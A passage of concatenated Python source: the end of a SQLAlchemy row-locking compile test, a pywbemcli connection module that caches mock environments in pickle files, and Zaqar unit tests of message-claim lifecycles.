"SELECT users.id AS users_id FROM users FOR SHARE NOWAIT",
dialect="postgresql",
)
def test_postgres_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect="postgresql",
)
def test_postgres_update_of(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(of=User.id),
"SELECT users.id AS users_id FROM users FOR UPDATE OF users",
dialect="postgresql",
)
def test_postgres_update_of_entity(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(of=User),
"SELECT users.id AS users_id FROM users FOR UPDATE OF users",
dialect="postgresql",
)
def test_postgres_update_of_entity_list(self):
User = self.classes.User
Address = self.classes.Address
sess = Session()
self.assert_compile(
sess.query(User.id, Address.id).with_for_update(
of=[User, Address]
),
"SELECT users.id AS users_id, addresses.id AS addresses_id "
"FROM users, addresses FOR UPDATE OF users, addresses",
dialect="postgresql",
)
def test_postgres_for_no_key_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(key_share=True),
"SELECT users.id AS users_id FROM users FOR NO KEY UPDATE",
dialect="postgresql",
)
def test_postgres_for_no_key_nowait_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(key_share=True, nowait=True),
"SELECT users.id AS users_id FROM users FOR NO KEY UPDATE NOWAIT",
dialect="postgresql",
)
def test_postgres_update_of_list(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(
of=[User.id, User.id, User.id]
),
"SELECT users.id AS users_id FROM users FOR UPDATE OF users",
dialect="postgresql",
)
def test_postgres_update_skip_locked(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(skip_locked=True),
"SELECT users.id AS users_id FROM users FOR UPDATE SKIP LOCKED",
dialect="postgresql",
)
def test_oracle_update(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(),
"SELECT users.id AS users_id FROM users FOR UPDATE",
dialect="oracle",
)
def test_oracle_update_skip_locked(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(skip_locked=True),
"SELECT users.id AS users_id FROM users FOR UPDATE SKIP LOCKED",
dialect="oracle",
)
def test_mysql_read(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User.id).with_for_update(read=True),
"SELECT users.id AS users_id FROM users LOCK IN SHARE MODE",
dialect="mysql",
)
def test_for_update_on_inner_w_joinedload(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User)
.options(joinedload(User.addresses))
.with_for_update()
.limit(1),
"SELECT anon_1.users_id AS anon_1_users_id, anon_1.users_name "
"AS anon_1_users_name, addresses_1.id AS addresses_1_id, "
"addresses_1.user_id AS addresses_1_user_id, "
"addresses_1.email_address AS addresses_1_email_address "
"FROM (SELECT users.id AS users_id, users.name AS users_name "
"FROM users LIMIT %s FOR UPDATE) AS anon_1 "
"LEFT OUTER JOIN addresses AS addresses_1 "
"ON anon_1.users_id = addresses_1.user_id FOR UPDATE",
dialect="mysql",
)
def test_for_update_on_inner_w_joinedload_no_render_oracle(self):
User = self.classes.User
sess = Session()
self.assert_compile(
sess.query(User)
.options(joinedload(User.addresses))
.with_for_update()
.limit(1),
"SELECT anon_1.users_id AS anon_1_users_id, "
"anon_1.users_name AS anon_1_users_name, "
"addresses_1.id AS addresses_1_id, "
"addresses_1.user_id AS addresses_1_user_id, "
"addresses_1.email_address AS addresses_1_email_address "
"FROM (SELECT anon_2.users_id AS users_id, "
"anon_2.users_name AS users_name FROM "
"(SELECT users.id AS users_id, users.name AS users_name "
"FROM users) anon_2 WHERE ROWNUM <= [POSTCOMPILE_param_1]) anon_1 "
"LEFT OUTER JOIN addresses addresses_1 "
"ON anon_1.users_id = addresses_1.user_id FOR UPDATE",
dialect="oracle",
)
|
|
# (C) Copyright 2017 IBM Corp.
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Mixin class that adds methods to WBEMConnection and FakeWBEMConnection for
pywbemcli usage
This contains only methods that use the iter<...> operations but also execute
the complete iterations so that we can use these as common operations for
pywbemcli instead of having to execute an algorithm of pull vs non-pull
everywhere xa WBEMConnection possible pull operation is called.
It also adds a method to FakeWBEMConnection to build the repository.
"""
from __future__ import absolute_import, print_function
import os
import io
import errno
import glob
import hashlib
import pickle
import click
import packaging.version
import pywbem
import pywbem_mock
from .config import DEFAULT_MAXPULLCNT
from .._utils import ensure_bytes, ensure_unicode, DEFAULT_CONNECTIONS_FILE
from . import mockscripts
PYWBEM_VERSION = packaging.version.parse(pywbem.__version__)
# __all__ = ['PYWBEMCLIConnection', 'PYWBEMCLIFakedConnection']
# pylint: disable=useless-object-inheritance
class PYWBEMCLIConnectionMixin(object):
"""
Mixin class to extend WBEMConnection with a set of methods that use the
iter<...> methods as the basis for getting Instances, etc. but add the
generator processing to retrieve the instances. These can be used within
pywbemcli to allow one method call to ack as either a pull or traditional
operation pushing the differences into this mixin.
These methods do not resolve the core issues between the traditional and
pull operations such as the fact that only the pull operations pass
the FilterQuery parameter.
They are a pywbemcli convience to simplify the individual action processing
methods to a single call.
"""
def PyWbemcliEnumerateInstancePaths(self, ClassName, namespace=None,
FilterQueryLanguage=None,
FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterEnumerateInstancePaths and retrieve the instances. Returns
the returned instances.
Uses the same parameters as the IterEnumerateInstancePaths method.
All exceptions from the underlying command are passed through this
method.
"""
result = self.IterEnumerateInstancePaths(
ClassName,
namespace=namespace,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliEnumerateInstances(self, ClassName, namespace=None,
LocalOnly=None,
DeepInheritance=None,
IncludeQualifiers=None,
IncludeClassOrigin=None, PropertyList=None,
FilterQueryLanguage=None, FilterQuery=None,
OperationTimeout=None, ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterEnumerateInstances and retrieve the instances. Returns
the returned instances.
Uses the same parameters as the IterEnumerateInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterEnumerateInstances(
ClassName,
namespace=namespace,
LocalOnly=LocalOnly,
DeepInheritance=DeepInheritance,
IncludeQualifiers=IncludeQualifiers,
IncludeClassOrigin=IncludeClassOrigin,
PropertyList=PropertyList,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliReferenceInstancePaths(self, InstanceName, ResultClass=None,
Role=None,
FilterQueryLanguage=None,
FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterReferemceInstancePaths and retrieve the instances. Returns
the paths that result from iterating the IterReferenceInstancePaths.
Uses the same parameters as the IterReferemceInstancePaths method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterReferenceInstancePaths(
InstanceName,
ResultClass=ResultClass,
Role=Role,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliReferenceInstances(self, InstanceName, ResultClass=None,
Role=None, IncludeQualifiers=None,
IncludeClassOrigin=None, PropertyList=None,
FilterQueryLanguage=None, FilterQuery=None,
OperationTimeout=None, ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterReferencesInstances and retrieve the instances. Returns
the returned instances.
Uses the same parameters as the IterReferencesInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterReferenceInstances(
InstanceName,
ResultClass=ResultClass,
Role=Role,
IncludeQualifiers=IncludeQualifiers,
IncludeClassOrigin=IncludeClassOrigin,
PropertyList=PropertyList,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliAssociatorInstancePaths(self, InstanceName, AssocClass=None,
ResultClass=None,
Role=None, ResultRole=None,
FilterQueryLanguage=None,
FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterAssociatorInstancePaths and retrieve the paths. Returns
the paths that result from iterating the IterAssociatorInstancePaths.
Uses the same parameters as the IterAssociatorInstancePaths method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterAssociatorInstancePaths(
InstanceName,
AssocClass=AssocClass,
ResultClass=ResultClass,
Role=Role,
ResultRole=ResultRole,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliAssociatorInstances(self, InstanceName, AssocClass=None,
ResultClass=None,
Role=None, ResultRole=None,
IncludeQualifiers=None,
IncludeClassOrigin=None, PropertyList=None,
FilterQueryLanguage=None, FilterQuery=None,
OperationTimeout=None,
ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterAssociatorInstances and retrieve the instances. Returns
the instances that result from iterating the IterAssociatorInstances.
Uses the same parameters as the IterAssociatorInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterAssociatorInstances(
InstanceName,
AssocClass=AssocClass,
ResultClass=ResultClass,
Role=Role,
ResultRole=ResultRole,
IncludeQualifiers=IncludeQualifiers,
IncludeClassOrigin=IncludeClassOrigin,
PropertyList=PropertyList,
FilterQueryLanguage=FilterQueryLanguage,
FilterQuery=FilterQuery,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
def PyWbemcliQueryInstances(self, FilterQueryLanguage, FilterQuery,
namespace=None, ReturnQueryResultClass=None,
OperationTimeout=None, ContinueOnError=None,
MaxObjectCount=DEFAULT_MAXPULLCNT,
**extra):
# pylint: disable=unused-argument
# pylint: disable=invalid-name
"""
Execute IterQueryInstances and retrieve the instances. Returns
the instances that result from iterating the IterQueryInstances.
Uses the same parameters as the IterQueryInstances method.
All exceptions from the underlying method are passed through this
method.
"""
result = self.IterQueryInstances(
FilterQueryLanguage,
FilterQuery,
namespace=namespace,
ReturnQueryResultClass=ReturnQueryResultClass,
OperationTimeout=OperationTimeout,
ContinueOnError=ContinueOnError,
MaxObjectCount=MaxObjectCount)
return list(result)
class BuildMockenvMixin(object):
# pylint: disable=too-few-public-methods
"""
Mixin class for pywbem_mock.FakedWBEMConnection that adds the ability to
build the mock environment of a connection from a connection definition in
a connections file.
"""
def build_mockenv(self, server, file_path_list, connections_file,
connection_name, verbose):
"""
Builds the mock environment of the 'self' connection from the input
files, or from the mock cache of the connection if it is up to date.
If the mock environment was built from the input files, the mock
environment of the connection is dumped to its cache.
The input files for building the mock environment are:
* MOF files with a suffix of '.mof'.
These files are compiled into the default namespace of the connection.
* Python files with a suffix of '.py'.
These files are mock scripts that are imported and thereby executed.
The mock scripts can be used for any kind of setup of the mock
environment, for example for creating namespaces, for defining
provider classes and registering providers, or for adding CIM objects
either directly through add_cimobjects() or by compiling MOF files.
Mock scripts support two approaches for passing the connection and
server objects they should operate on:
* via a setup() function defined in the mock script. This is the
recommended approach, and it supports caching. The setup()
function has the following parameters:
conn (pywbem_mock.FakedWBEMConnection): The mock connection.
server (pywbem.WBEMServer): The server object for the mock
connection.
verbose (bool): Verbose flag from the command line.
* via global variables made available to the mock script. This
approach prevents caching. The following global variables are
made available:
CONN (pywbem_mock.FakedWBEMConnection): The mock connection.
SERVER (pywbem.WBEMServer): The server object for the mock
connection.
VERBOSE (bool): Verbose flag from the command line.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
server (pywbem.WBEMServer): The server object for the mock connection.
file_path_list (list of string): The path names of the input files
for building the mock environment, from the connection definition.
connections_file (string): Path name of the connections file.
connection_name (string): The name of the connection definition in
the connections file.
verbose (bool): Verbose flag from the command line.
Raises:
MockFileError: Mock file does not exist.
MockMOFCompileError: Mock MOF file fails to compile.
MockScriptError: Mock script fails to execute.
SetupNotSupportedError (py<3.5): New-style setup in mock script not
supported.
"""
# Check that the input files exist. Since we loop through them multiple
# times, we check that once.
for file_path in file_path_list:
if not os.path.exists(file_path):
raise mockscripts.MockFileError(
"Mock file does not exist: {}".format(file_path))
# The connections file is set if a named connection is used, i.e.
# when specifying the -n general option. It is not set when the -s or -m
# general options were specified. When no connections file is set, no
# caching happens because there is no connection definition context
# which is required for caching.
if connections_file == DEFAULT_CONNECTIONS_FILE:
cache_rootdir = mockcache_rootdir()
if not os.path.isdir(cache_rootdir):
os.mkdir(cache_rootdir)
cache_dir = mockcache_cachedir(
cache_rootdir, connections_file, connection_name)
if not os.path.isdir(cache_dir):
os.mkdir(cache_dir)
# The mockenv pickle file contains the pickled state of the mock
# environment.
mockenv_pickle_file = os.path.join(cache_dir, 'mockenv.pkl')
# The depreg pickle file contains the provider dependents
# registry of the connection. It is used to look up the dependent
# files of a mock script. The content of these dependent files is
# also taken into account when determining whether the cache is up
# to date. This needs to go into a separate pickle file because
# it needs to be loaded and examined before the mckenv pickle
# file is loaded.
depreg_pickle_file = os.path.join(cache_dir, 'depreg.pkl')
# The md5 file contains the MD5 hash value of the content of the
# input files for the mock environment, and also taken into account
# when determining whether the cache is up to date.
md5_file = os.path.join(cache_dir, 'mockfiles.md5')
# Flag indicating that the mock environment needs to be built
# (or re-built). If False, the mock environment cache can be used.
need_rebuild = False
# Determine whether the mock environment needs to be rebuilt based
# on the (non-)existence of the cache files.
if not os.path.isfile(mockenv_pickle_file) \
or not os.path.isfile(depreg_pickle_file) \
or not os.path.isfile(md5_file):
if verbose:
click.echo("Mock environment for connection definition "
"'{}' will be built because it was not cached.".
format(connection_name))
need_rebuild = True
try:
depreg = self._load_depreg(depreg_pickle_file)
except (IOError, OSError) as exc:
if exc.errno == errno.ENOENT:
depreg = pywbem_mock.ProviderDependentRegistry()
else:
raise
# Calculate the MD5 hash value of the content of the input files
md5 = hashlib.md5()
for file_path in file_path_list:
with io.open(file_path, 'rb') as fp:
file_source = fp.read()
md5.update(file_source)
# For mock scripts, take their dependent files into account
if file_path.endswith('.py'):
dep_files = depreg.iter_dependents(file_path)
for dep_file in dep_files:
with io.open(dep_file, 'rb') as fp:
file_source = fp.read()
md5.update(file_source)
# Add the cache dir, so that manual tweaks on the cache files
# invalidates the cache.
md5.update(ensure_bytes(cache_dir))
new_md5_value = ensure_unicode(md5.hexdigest())
# Determine whether the mock environment needs to be rebuilt based
# on the MD5 hash value of the input file content.
if not need_rebuild:
with io.open(md5_file, 'r', encoding='utf-8') as fp:
cached_md5_value = fp.read()
if new_md5_value != cached_md5_value:
if verbose:
click.echo("Mock environment for connection "
"definition '{}' is cached but will be "
"rebuilt because the mock files have "
"changed.".format(connection_name))
need_rebuild = True
cache_it = True
elif connections_file:
# User-specified connections file used.
if verbose:
click.echo("Mock environment for connection definition '{}' "
"will be built because user-specified connections "
"files are not cached.".format(connection_name))
need_rebuild = True
cache_it = False
else:
# No connections file context.
if verbose:
click.echo("Mock environment for connection definition '{}' "
"will be built because no connections file is "
"known.".format(connection_name))
need_rebuild = True
cache_it = False
if need_rebuild:
try:
self._build_mockenv(server, file_path_list, verbose)
except mockscripts.NotCacheable as exc:
if verbose:
click.echo("Mock environment for connection definition "
"'{}' will be built because it is not "
"cacheable: {}.".format(connection_name, exc))
else:
if connections_file and cache_it:
self._dump_mockenv(mockenv_pickle_file)
self._dump_depreg(
self.provider_dependent_registry, depreg_pickle_file)
with io.open(md5_file, 'w', encoding='utf-8') as fp:
fp.write(new_md5_value)
if verbose:
click.echo("Mock environment for connection "
"definition '{}' has been written to "
"cache.".format(connection_name))
else:
# When no rebuild is needed, there must have been a connections
# file set.
assert connections_file
try:
self._load_mockenv(mockenv_pickle_file, file_path_list)
if verbose:
click.echo("Mock environment for connection definition "
"'{}' has been loaded from cache.".
format(connection_name))
except mockscripts.NotCacheable as exc:
if verbose:
click.echo("Mock environment for connection definition "
"'{}' will be rebuilt because it is not "
"cacheable: {}.".format(connection_name, exc))
self._build_mockenv(server, file_path_list, verbose)
def _build_mockenv(self, server, file_path_list, verbose):
"""
Build the mock environment from the input files.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
server (pywbem.WBEMServer): The server object for the mock connection.
file_path_list (list of string): The path names of the input files
for building the mock environment, from the connection definition.
verbose (bool): Verbose flag from the command line.
Raises:
NotCacheable (py<3.5): Mock environment is not cacheable.
MockMOFCompileError: Mock MOF file fails to compile.
MockScriptError: Mock script fails to execute.
SetupNotSupportedError (py<3.5): New-style setup in mock script not
supported.
"""
for file_path in file_path_list:
ext = os.path.splitext(file_path)[1]
if ext == '.mof':
try:
# Displays any MOFParseError already
self.compile_mof_file(file_path, verbose=verbose)
except pywbem.Error as er:
# Abort the entire pywbemcli command because the
# MOF compilation might have caused inconsistencies in
# the mock repository.
if PYWBEM_VERSION.release >= (1, 0, 0):
# display just the exception.
msg = "MOF compile failed:\n{0}".format(er)
else:
# display file name. Error text displayed already.
if isinstance(er, pywbem.MOFParseError):
msg = "MOF compile failed: File: '{0}'" \
"(see above)".format(file_path)
else: # not parse error, display exception
msg = "MOF compile failed: File: {0} " \
"Error: {1}".format(file_path, er)
new_exc = mockscripts.MockMOFCompileError(msg)
new_exc.__cause__ = None
raise new_exc
else:
assert ext == '.py' # already checked
# May raise various mockscripts.MockError exceptions.
# NotCacheable will be handled by the caller by building the
# mock env.
mockscripts.setup_script(file_path, self, server, verbose)
def _dump_mockenv(self, mockenv_pickle_file):
"""
Dump the mock environment of the connection to the mockenv pickle file.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
mockenv_pickle_file (pywbem.WBEMServer): Path name of the mockenv
pickle file.
"""
# Save the provider registry and the CIM repository
# We construct a single object, because the CIM repository is
# referenced from each provider, and pickle properly handles
# multiple references to the same object.
mockenv = dict(
cimrepository=self.cimrepository,
# pylint: disable=protected-access
provider_registry=self._provider_registry,
)
with io.open(mockenv_pickle_file, 'wb') as fp:
pickle.dump(mockenv, fp)
def _load_mockenv(self, mockenv_pickle_file, file_path_list):
"""
Load the mock environment from the mockenv pickle file.
This method also imports the Python scripts from the input files in
order to re-establish any class definitions that may be needed, for
example provider classes.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
mockenv_pickle_file (pywbem.WBEMServer): Path name of the mockenv
pickle file.
file_path_list (list of string): The path names of the input files
for building the mock environment, from the connection definition.
Raises:
NotCacheable (py<3.5): Mock environment is not cacheable.
"""
# Restore the provider classes
for file_path in file_path_list:
ext = os.path.splitext(file_path)[1]
if ext == '.py':
# May raise mockscripts.NotCacheable which will be handled by
# the caller by building the mock env.
mockscripts.import_script(file_path)
# Restore the provider registry and the CIM repository
with io.open(mockenv_pickle_file, 'rb') as fp:
mockenv = pickle.load(fp)
# Others have references to the self._cimrepository object, so we are
# not replacing that object, but are rather replacing the state of
# that object.
cimrepository = mockenv['cimrepository']
assert isinstance(cimrepository, pywbem_mock.InMemoryRepository)
# pylint: disable=protected-access
self._cimrepository.load(cimrepository)
provider_registry = mockenv['provider_registry']
assert isinstance(provider_registry, pywbem_mock.ProviderRegistry)
# pylint: disable=protected-access
self._provider_registry.load(provider_registry)
@staticmethod
def _dump_depreg(depreg, depreg_pickle_file):
"""
Dump a provider dependent registry to a pickle file.
Parameters:
depreg (pywbem_mock.ProviderDependentRegistry): Provider dependent
registry to be dumped.
depreg_pickle_file (string): Path name of the pickle file.
"""
with io.open(depreg_pickle_file, 'wb') as fp:
pickle.dump(depreg, fp)
@staticmethod
def _load_depreg(depreg_pickle_file):
"""
Load a provider dependent registry from a pickle file and return it.
Parameters:
depreg_pickle_file (string): Path name of the pickle file to be
loaded.
Returns:
pywbem_mock.ProviderDependentRegistry: Provider dependent registry.
"""
with io.open(depreg_pickle_file, 'rb') as fp:
depreg = pickle.load(fp)
return depreg
class PYWBEMCLIConnection(pywbem.WBEMConnection, PYWBEMCLIConnectionMixin):
"""
PyWBEMCLIConnection subclass adds the methods added by
PYWBEMCLIConnectionMixin
"""
def __init__(self, *args, **kwargs):
"""
ctor passes all input parameters to superclass
"""
super(PYWBEMCLIConnection, self).__init__(*args, **kwargs)
class PYWBEMCLIFakedConnection(BuildMockenvMixin,
PYWBEMCLIConnectionMixin,
pywbem_mock.FakedWBEMConnection):
"""
PyWBEMCLIFakedConnection subclass adds the methods added by
PYWBEMCLIConnectionMixin
"""
def __init__(self, *args, **kwargs):
"""
ctor passes all input parameters to superclass
"""
super(PYWBEMCLIFakedConnection, self).__init__(*args, **kwargs)
def mockcache_rootdir():
"""
Return the directory path of the mock cache root directory.
"""
dir_path = os.path.join(os.path.expanduser('~'), '.pywbemcli_mockcache')
return dir_path
def mockcache_cachedir(rootdir, connections_file, connection_name):
"""
Return the directory path of the mock cache directory for a connection.
"""
# Construct a (reproducible) cache ID from connections file path and
# connection definition name.
# Example: 6048a3da1a34a3ec605825a1493c7bb5.simple
try:
connections_file = os.path.relpath(
connections_file, os.path.expanduser('~'))
except ValueError:
# On Windows, os.path.relpath() raises ValueError when the paths
# are on different drives
pass
md5 = hashlib.md5()
md5.update(connections_file.encode("utf-8"))
cache_id = "{}.{}".format(md5.hexdigest(), connection_name)
dir_path = os.path.join(rootdir, cache_id)
return dir_path
def delete_mock_cache(connections_file, connection_name):
"""
Delete the mock cache of the connection, if it exists.
Parameters:
self (pywbem_mock.FakedWBEMConnection): The mock connection.
connections_file (string): Path name of the connections file.
connection_name (string): The name of the connection definition in
the connections file.
Raises:
OSError: Mock cache cannot be deleted.
"""
cache_dir = mockcache_cachedir(
mockcache_rootdir(), connections_file, connection_name)
if os.path.isdir(cache_dir):
file_list = glob.glob(os.path.join(cache_dir, '*'))
for _file in file_list:
os.remove(_file)
os.rmdir(cache_dir)
|
|
# Copyright (c) 2013 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from unittest import mock
import ddt
import falcon
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from testtools import matchers
from zaqar import tests as testing
from zaqar.tests.unit.transport.wsgi import base
@ddt.ddt
class TestClaimsMongoDB(base.V1Base):
config_file = 'wsgi_mongodb.conf'
@testing.requires_mongodb
def setUp(self):
super(TestClaimsMongoDB, self).setUp()
self.project_id = '480924'
self.queue_path = self.url_prefix + '/queues/fizbit'
self.claims_path = self.queue_path + '/claims'
self.messages_path = self.queue_path + '/messages'
doc = '{"_ttl": 60}'
self.simulate_put(self.queue_path, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_201, self.srmock.status)
doc = jsonutils.dumps([{'body': 239, 'ttl': 300}] * 10)
self.simulate_post(self.queue_path + '/messages', self.project_id,
body=doc, headers={'Client-ID':
uuidutils.generate_uuid()})
self.assertEqual(falcon.HTTP_201, self.srmock.status)
def tearDown(self):
storage = self.boot.storage._storage
control = self.boot.control
connection = storage.connection
connection.drop_database(control.queues_database)
for db in storage.message_databases:
connection.drop_database(db)
self.simulate_delete(self.queue_path, self.project_id)
super(TestClaimsMongoDB, self).tearDown()
@ddt.data(None, '[', '[]', '{}', '.', '"fail"')
def test_bad_claim(self, doc):
self.simulate_post(self.claims_path, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_400, self.srmock.status)
href = self._get_a_claim()
self.simulate_patch(href, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_400, self.srmock.status)
def test_exceeded_claim(self):
self.simulate_post(self.claims_path, self.project_id,
body='{"ttl": 100, "grace": 60}',
query_string='limit=21')
self.assertEqual(falcon.HTTP_400, self.srmock.status)
@ddt.data((-1, -1), (59, 60), (60, 59), (60, 43201), (43201, 60))
def test_unacceptable_ttl_or_grace(self, ttl_grace):
ttl, grace = ttl_grace
self.simulate_post(self.claims_path, self.project_id,
body=jsonutils.dumps({'ttl': ttl, 'grace': grace}))
self.assertEqual(falcon.HTTP_400, self.srmock.status)
@ddt.data(-1, 59, 43201)
def test_unacceptable_new_ttl(self, ttl):
href = self._get_a_claim()
self.simulate_patch(href, self.project_id,
body=jsonutils.dumps({'ttl': ttl}))
self.assertEqual(falcon.HTTP_400, self.srmock.status)
def _get_a_claim(self):
doc = '{"ttl": 100, "grace": 60}'
self.simulate_post(self.claims_path, self.project_id, body=doc)
return self.srmock.headers_dict['Location']
def test_lifecycle(self):
doc = '{"ttl": 100, "grace": 60}'
# First, claim some messages
body = self.simulate_post(self.claims_path, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_201, self.srmock.status)
claimed = jsonutils.loads(body[0])
claim_href = self.srmock.headers_dict['Location']
message_href, params = claimed[0]['href'].split('?')
# No more messages to claim
self.simulate_post(self.claims_path, self.project_id, body=doc,
query_string='limit=3')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
headers = {
'Client-ID': uuidutils.generate_uuid(),
}
# Listing messages, by default, won't include claimed
body = self.simulate_get(self.messages_path, self.project_id,
headers=headers)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Include claimed messages this time
body = self.simulate_get(self.messages_path, self.project_id,
query_string='include_claimed=true',
headers=headers)
listed = jsonutils.loads(body[0])
self.assertEqual(falcon.HTTP_200, self.srmock.status)
self.assertEqual(len(claimed), len(listed['messages']))
now = timeutils.utcnow() + datetime.timedelta(seconds=10)
timeutils_utcnow = 'oslo_utils.timeutils.utcnow'
with mock.patch(timeutils_utcnow) as mock_utcnow:
mock_utcnow.return_value = now
body = self.simulate_get(claim_href, self.project_id)
claim = jsonutils.loads(body[0])
self.assertEqual(falcon.HTTP_200, self.srmock.status)
self.assertEqual(claim_href,
self.srmock.headers_dict['Content-Location'])
self.assertEqual(100, claim['ttl'])
# NOTE(cpp-cabrera): verify that claim age is non-negative
self.assertThat(claim['age'], matchers.GreaterThan(-1))
# Try to delete the message without submitting a claim_id
self.simulate_delete(message_href, self.project_id)
self.assertEqual(falcon.HTTP_403, self.srmock.status)
# Delete the message and its associated claim
self.simulate_delete(message_href, self.project_id,
query_string=params)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Try to get it from the wrong project
self.simulate_get(message_href, 'bogus_project', query_string=params)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# Get the message
self.simulate_get(message_href, self.project_id, query_string=params)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# Update the claim
new_claim_ttl = '{"ttl": 60}'
creation = timeutils.utcnow()
self.simulate_patch(claim_href, self.project_id, body=new_claim_ttl)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Get the claimed messages (again)
body = self.simulate_get(claim_href, self.project_id)
query = timeutils.utcnow()
claim = jsonutils.loads(body[0])
message_href, params = claim['messages'][0]['href'].split('?')
self.assertEqual(60, claim['ttl'])
estimated_age = timeutils.delta_seconds(creation, query)
self.assertGreater(estimated_age, claim['age'])
# Delete the claim
self.simulate_delete(claim['href'], 'bad_id')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
self.simulate_delete(claim['href'], self.project_id)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Try to delete a message with an invalid claim ID
self.simulate_delete(message_href, self.project_id,
query_string=params)
self.assertEqual(falcon.HTTP_400, self.srmock.status)
# Make sure it wasn't deleted!
self.simulate_get(message_href, self.project_id, query_string=params)
self.assertEqual(falcon.HTTP_200, self.srmock.status)
# Try to get a claim that doesn't exist
self.simulate_get(claim['href'])
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# Try to update a claim that doesn't exist
self.simulate_patch(claim['href'], body=doc)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
def test_post_claim_nonexistent_queue(self):
path = self.url_prefix + '/queues/nonexistent/claims'
self.simulate_post(path, self.project_id,
body='{"ttl": 100, "grace": 60}')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
def test_get_claim_nonexistent_queue(self):
path = self.url_prefix + '/queues/nonexistent/claims/aaabbbba'
self.simulate_get(path)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# NOTE(cpp-cabrera): regression test against bug #1203842
def test_get_nonexistent_claim_404s(self):
self.simulate_get(self.claims_path + '/a')
self.assertEqual(falcon.HTTP_404, self.srmock.status)
